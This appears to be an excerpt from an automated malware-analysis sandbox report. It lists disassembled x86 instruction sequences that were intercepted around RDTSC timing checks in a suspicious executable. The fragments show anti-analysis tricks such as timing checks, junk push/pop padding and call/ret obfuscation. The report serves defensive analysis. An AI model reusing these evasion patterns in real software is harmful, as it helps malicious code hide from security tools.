Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4B2E42 second address: 4B2E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4B2E4A second address: 4B2E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5074A5 second address: 5074E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0512h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, ecx 0x0000000f movsx ebx, dx 0x00000012 push 00000000h 0x00000014 xor bx, EE14h 0x00000019 push 00000000h 0x0000001b or dword ptr [ebp+122D37CDh], ebx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0FE14B050Ch 0x00000029 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50A5B8 second address: 50A5CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50A5CB second address: 50A5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F0FE14B050Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50A5E3 second address: 50A5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE0B8ED3Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50AC11 second address: 50AC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5041AD second address: 5041B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5041B1 second address: 5041B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5041B7 second address: 5041BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5041BC second address: 504222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0FE14B0508h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 movsx ebx, si 0x00000027 push dword ptr fs:[00000000h] 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D20BCh], ebx 0x00000035 popad 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov di, AAA1h 0x00000041 mov eax, dword ptr [ebp+122D011Dh] 0x00000047 mov bx, cx 0x0000004a push FFFFFFFFh 0x0000004c jmp 00007F0FE14B050Bh 0x00000051 nop 0x00000052 push ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 jnp 00007F0FE14B0506h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 504222 second address: 504226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50BC28 second address: 50BC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50BC2C second address: 50BC7C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0FE0B8ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F0FE0B8ED38h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D227Ah], ecx 0x0000002c push 00000000h 0x0000002e movsx edi, bx 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 sub dword ptr [ebp+12448DACh], edx 0x0000003a mov dword ptr [ebp+122D2ABCh], edx 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 push esi 0x00000043 jp 00007F0FE0B8ED3Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50BC7C second address: 50BC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 508600 second address: 508604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50BC87 second address: 50BC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 508604 second address: 50860A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50860A second address: 5086B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0FE14B050Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F0FE14B0508h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 sub dword ptr [ebp+12448DF3h], ecx 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007F0FE14B0517h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f pushad 0x00000040 jns 00007F0FE14B050Bh 0x00000046 mov edi, 15ED6D86h 0x0000004b popad 0x0000004c mov eax, dword ptr [ebp+122D11F9h] 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007F0FE14B0508h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 00000017h 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c push FFFFFFFFh 0x0000006e mov ebx, dword ptr [ebp+12458281h] 0x00000074 push eax 0x00000075 jng 00007F0FE14B0518h 0x0000007b push eax 0x0000007c push edx 0x0000007d jne 00007F0FE14B0506h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50E6D8 second address: 50E6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50CE3B second address: 50CE58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0FE14B050Fh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50CE58 second address: 50CE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 50CE5C second address: 50CE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51456B second address: 514571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 514571 second address: 514575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 514575 second address: 51457A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4ADF72 second address: 4ADF97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0FE14B050Dh 0x00000013 jl 00007F0FE14B050Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 513F87 second address: 513F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 513F8D second address: 513F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0FE14B0506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 513F97 second address: 513F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 519A02 second address: 519A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 519A06 second address: 519A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51EE5E second address: 51EE6F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0FE14B0508h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51E085 second address: 51E0B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F0FE0B8ED36h 0x00000009 jmp 00007F0FE0B8ED44h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 jnc 00007F0FE0B8ED36h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push esi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51E294 second address: 51E2C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0FE14B0515h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0FE14B0514h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51E2C3 second address: 51E2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51E2C8 second address: 51E2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51E2CE second address: 51E2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51E710 second address: 51E72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0FE14B0512h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51ECCB second address: 51ECE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0FE0B8ED44h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51ECE6 second address: 51ECF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51ECF4 second address: 51ECF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51ECF8 second address: 51ECFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 51ECFC second address: 51ED02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 524005 second address: 52400B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52400B second address: 52402C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0FE0B8ED36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F0FE0B8ED3Eh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52402C second address: 524035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 523BA7 second address: 523BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0FE0B8ED46h 0x00000008 jo 00007F0FE0B8ED36h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F0FE0B8ED41h 0x00000017 jmp 00007F0FE0B8ED45h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 524AB8 second address: 524AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0FE14B0506h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 524AC9 second address: 524ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 524ED1 second address: 524EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0511h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 524EE6 second address: 524EFA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0FE0B8ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0FE0B8ED36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 524EFA second address: 524EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F7DF6 second address: 4F7E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F0FE0B8ED36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 jng 00007F0FE0B8ED4Dh 0x00000016 jmp 00007F0FE0B8ED47h 0x0000001b pop edi 0x0000001c nop 0x0000001d mov edx, dword ptr [ebp+122D3AF3h] 0x00000023 lea eax, dword ptr [ebp+12482BA5h] 0x00000029 jmp 00007F0FE0B8ED3Dh 0x0000002e nop 0x0000002f je 00007F0FE0B8ED44h 0x00000035 jmp 00007F0FE0B8ED3Eh 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F7E59 second address: 4F7E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8010 second address: 4F8021 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F83EA second address: 4F8423 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0FE14B0508h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jc 00007F0FE14B0512h 0x00000014 jmp 00007F0FE14B050Ch 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0FE14B0511h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8423 second address: 4F8437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8437 second address: 4F844C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B0511h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F844C second address: 4F84A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F0FE0B8ED47h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0FE0B8ED38h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov cx, 7505h 0x00000030 push D3B20600h 0x00000035 jp 00007F0FE0B8ED42h 0x0000003b jl 00007F0FE0B8ED3Ch 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8580 second address: 4F859A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B0516h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F861B second address: 4F8631 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0FE0B8ED3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8631 second address: 4F8635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F870E second address: 4F8712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8EE4 second address: 4F8EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8EE8 second address: 4F8EF6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0FE0B8ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F90CD second address: 4D264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov cl, bh 0x0000000e mov dword ptr [ebp+122D2C3Dh], ecx 0x00000014 popad 0x00000015 call dword ptr [ebp+122D2DC1h] 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4D264A second address: 4D265E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED3Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4D265E second address: 4D2664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4D2664 second address: 4D2697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F0FE0B8ED4Eh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 jbe 00007F0FE0B8ED3Eh 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4B49A1 second address: 4B49B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0FE14B0506h 0x0000000a je 00007F0FE14B050Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52B62B second address: 52B631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52B631 second address: 52B643 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F0FE14B0506h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BA64 second address: 52BA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0FE0B8ED3Eh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BBCC second address: 52BBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BD53 second address: 52BD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0FE0B8ED3Fh 0x0000000b popad 0x0000000c js 00007F0FE0B8ED3Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BD71 second address: 52BD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BD7E second address: 52BDA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0FE0B8ED36h 0x00000008 jmp 00007F0FE0B8ED48h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BF18 second address: 52BF1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BF1E second address: 52BF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0FE0B8ED36h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 52BF2F second address: 52BF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0FE14B0506h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
